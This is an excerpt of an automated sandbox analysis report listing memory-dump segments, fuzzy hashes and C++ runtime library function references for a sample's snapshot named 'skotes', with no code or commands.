• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: EqualOffsetTypeids
• String ID:
• API String ID: 1707706676-0
• Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
• Instruction ID: 1590a19df27332b3d23598db4134cb44fa8341e53e13772f1e89e56e97734399
• Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
• Instruction Fuzzy Hash: 8C517735A042099FCB11DF68C4A0BFEBBF6EF15354B14449EE852A7361DB32AA45CB90
APIs
• Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 006BDB64
  • Part of subcall function 006B8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 006B8F50
• Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 006BDBC3
• Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 006BDBE9
• Concurrency::location::_Assign.LIBCMT ref: 006BDC56
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1091748018-0
                                                                                                                                                                                                                                          • Opcode ID: ce9cb2002ea0296db1f28bb8666b90b1635cf089937f13563fc27fd7de449115
                                                                                                                                                                                                                                          • Instruction ID: 8e40aa01fc6ab53b61142df158b89f437a58d1717dda5a2aa9e2ebaad54ff407
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce9cb2002ea0296db1f28bb8666b90b1635cf089937f13563fc27fd7de449115
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4941E3F0604210ABDB19AB24C886BFDBB7BAF45320F14409DE5069F3C2DB74AD85CB95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _InternalDeleteHelper.LIBCONCRT ref: 006B56F2
                                                                                                                                                                                                                                          • _InternalDeleteHelper.LIBCONCRT ref: 006B5726
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 006B578B
                                                                                                                                                                                                                                          • SafeRWList.LIBCONCRT ref: 006B579A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
• String ID:
• API String ID: 893951542-0
APIs
• Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 006B2D0F
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: BuffersConcurrency::details::InitializeManager::Resource
• String ID:
• API String ID: 3433162309-0
                                                                                                                                                                                                                                          • Opcode ID: 6987e27c78233f1d4d1a901dd02c863a4c7d6fc3804eb518d8824eb064b83de3
                                                                                                                                                                                                                                          • Instruction ID: 316397c62afc7c7b9e28981f96fe3e400e69a45a1f4a2937a750b756207ff8e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6987e27c78233f1d4d1a901dd02c863a4c7d6fc3804eb518d8824eb064b83de3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C3108B5A0030ADFCF10DF94C490BEE7BBAAF44714F1404AAD9059B346D770A985DBA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006C13FC
                                                                                                                                                                                                                                          • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 006C1447
                                                                                                                                                                                                                                          • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 006C147A
                                                                                                                                                                                                                                          • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 006C152A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2092016602-0
                                                                                                                                                                                                                                          • Opcode ID: 8f021cbe20c08123864c5956ee6a0fb4645dae5ef10170a3893b29023cd2c770
                                                                                                                                                                                                                                          • Instruction ID: 0199a65ff42df07002e5a97f486f362c997c80e691ab2d2577e6763e87df167e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f021cbe20c08123864c5956ee6a0fb4645dae5ef10170a3893b29023cd2c770
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E3183B1A006059BCF44EFA8C4919EDFBF6FF45710B14822DE516AB381CB349A41CB94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 531285432-0
                                                                                                                                                                                                                                          • Opcode ID: 89cd37c8eec8293584f6b4ab9ccb8e18fb23059ae53279cd9d9df9d29aa15464
                                                                                                                                                                                                                                          • Instruction ID: e33c62303ab160b84f54c5b304842113a3dc52c00c529879a39efe8211a090de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89cd37c8eec8293584f6b4ab9ccb8e18fb23059ae53279cd9d9df9d29aa15464
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5211D71A00219AFDF00FBA4DC819BEB7BAEF0A720F101059F501AB251DB709D419FA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006B9C9C
                                                                                                                                                                                                                                          • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 006B9CE8
                                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 006B9CFE
                                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 006B9D6A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
• String ID:
• API String ID: 2033596534-0
• Opcode ID: c41509d2acce1e686654caa8606f54379636738e024aa0c7e866793e974d4f4d
• Instruction ID: 2a035f7e7ef2796850bbefa67dc2459d2942dcb8486afeae3c73b1755e6a5091
• Opcode Fuzzy Hash: c41509d2acce1e686654caa8606f54379636738e024aa0c7e866793e974d4f4d
• Instruction Fuzzy Hash: E921B6B1905A149FCB44EF65D482DEDBBB6EF05310B21406DF201AB261DF31AD82CB65
APIs
